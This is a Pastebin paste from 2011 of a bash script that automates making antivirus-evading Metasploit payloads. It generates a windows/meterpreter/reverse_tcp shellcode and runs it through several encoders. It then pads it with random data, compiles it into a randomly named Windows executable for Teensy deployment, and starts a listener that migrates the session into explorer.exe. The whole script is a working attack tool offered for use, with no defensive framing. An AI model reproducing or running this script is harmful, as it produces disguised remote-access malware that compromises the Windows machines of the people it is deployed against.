Advertisement
metacom

Untitled

Nov 13th, 2011
137
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 2.85 KB | None | 0 0
  1. #!/bin/bash
  2. echo "************************************************************"
  3. echo "    Automatic  shellcode generator - FOR METASPLOIT         "
  4. echo "                  By Astr0baby 2011                         "
  5. echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
  6. echo "    For Automatic Teensy programming and deployment         "
  7. echo "************************************************************"
  8. rm -rf ShellCode
  9.  
  10. echo "Here is a network device list available on yor machine"
  11. cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
  12. echo -e "What network interface are we gonna use ?  \c"
  13. read interface
  14. echo -e "What Port Number are we gonna listen to? : \c"
  15. read port
  16. echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
  17. read seed
  18. echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
  19. read enumber
  20. # Get OS name
  21. OS=`uname`
  22. IO="" # store IP
  23. case $OS in
  24.    Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
  25.    *) IP="Unknown";;
  26. esac
  27. #echo "$IP"
  28. ./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
  29. mkdir ShellCode
  30. mv test.c ShellCode
  31. cd ShellCode
  32. #Replacing plus signs at the end of line
  33. sed -e 's/+/ /g' test.c > clean.c
  34. sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
  35. echo "#include <stdio.h>" >> temp
  36. echo 'unsigned char ufs[]=' >> temp
  37. for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
  38. sed -i 's/$/"/' temp2
  39. sed -i 's/^/"/' temp2  
  40. echo  ';' >> temp2  
  41. cat temp2 >> temp
  42. cat ready.c >> temp
  43. mv temp ready2.c
  44. echo ";" >> ready2.c
  45. echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
  46. mv ready2.c final.c
  47. echo 'unsigned char tap[]=' > temp3
  48. for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
  49. sed -i 's/$/"/' temp4
  50. sed -i 's/^/"/' temp4
  51. echo  ';' >> temp4
  52. cat temp4 >> temp3
  53. cat temp3 >> final.c  
  54. #Cleanup
  55. rm -f clean.c
  56. rm -f test.c
  57. rm -f ready.c
  58. rm -f rand.c
  59. rm -f temp2
  60. rm -f temp3
  61. rm -f temp4
  62.  
  63. /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
  64. mv final.exe $RANDOM.exe
  65. filex=`ls -ct1 | head -1`
  66. sumx=`sha1sum $filex`
  67. echo $filex "...generated in ShellCode subfolder"
  68. echo $filex "sha1checksum is .." $sumx  
  69. strip --strip-debug $filex
  70. cd ..
  71. echo "      starting the meterpreter listener..."
  72. sleep 2
  73. ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E
  74.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement